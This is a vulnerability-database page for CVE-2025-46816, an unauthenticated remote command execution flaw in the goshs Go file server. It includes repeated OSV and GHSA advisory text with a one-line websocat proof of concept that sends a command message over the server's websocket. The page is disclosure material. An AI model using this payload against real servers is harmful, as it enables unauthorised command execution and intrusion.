CVE-2025-46816
published 2025-05-06CVE-2025-46816: goshs is a SimpleHTTPServer written in Go. Starting in version 0.3.4 and prior to version 1.0.5, running goshs without arguments makes it possible for anyone…
PriorityP261critical9.4CVSS 3.0
AVNACLPRNUINSUCHIHAL
EPSS
0.60%
44.5th percentile
goshs is a SimpleHTTPServer written in Go. Starting in version 0.3.4 and prior to version 1.0.5, running goshs without arguments makes it possible for anyone to execute commands on the server. The function `dispatchReadPump` does not checks the option cli `-c`, thus allowing anyone to execute arbitrary command through the use of websockets. Version 1.0.5 fixes the issue.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | patrickhener_goshs | >= 0.3.4 < 1.0.5 | 1.0.5 |
| patrickhener | goshs | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
goshs route not protected, allows command execution in github.com/patrickhener/goshs
osv·2025-05-15
CVE-2025-46816 goshs route not protected, allows command execution in github.com/patrickhener/goshs
goshs route not protected, allows command execution in github.com/patrickhener/goshs
goshs route not protected, allows command execution in github.com/patrickhener/goshs
OSV
goshs route not protected, allows command execution
osv·2025-05-06
CVE-2025-46816 [CRITICAL] goshs route not protected, allows command execution
goshs route not protected, allows command execution
### Summary
It seems that when running **goshs** without arguments it is possible for anyone to execute commands on the server. This was tested on version **1.0.4** of **goshs**. The command function was introduced in version **0.3.4**.
### Details
It seems that the function ```dispatchReadPump``` does not checks the option cli ```-c```, thus allowing anyone to execute arbitrary command through the use of websockets.
### PoC
Used **websocat** for the POC:
```bash
echo -e '{"type": "command", "content": "id"}' |./websocat 'ws://192.168.1.11:8000/?ws' -t
```
### Impact
The vulnerability will only impacts goshs server on vulnerable versions.
GHSA
goshs route not protected, allows command execution
ghsa·2025-05-06
CVE-2025-46816 [CRITICAL] CWE-284 goshs route not protected, allows command execution
goshs route not protected, allows command execution
### Summary
It seems that when running **goshs** without arguments it is possible for anyone to execute commands on the server. This was tested on version **1.0.4** of **goshs**. The command function was introduced in version **0.3.4**.
### Details
It seems that the function ```dispatchReadPump``` does not checks the option cli ```-c```, thus allowing anyone to execute arbitrary command through the use of websockets.
### PoC
Used **websocat** for the POC:
```bash
echo -e '{"type": "command", "content": "id"}' |./websocat 'ws://192.168.1.11:8000/?ws' -t
```
### Impact
The vulnerability will only impacts goshs server on vulnerable versions.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2025-05-06
Published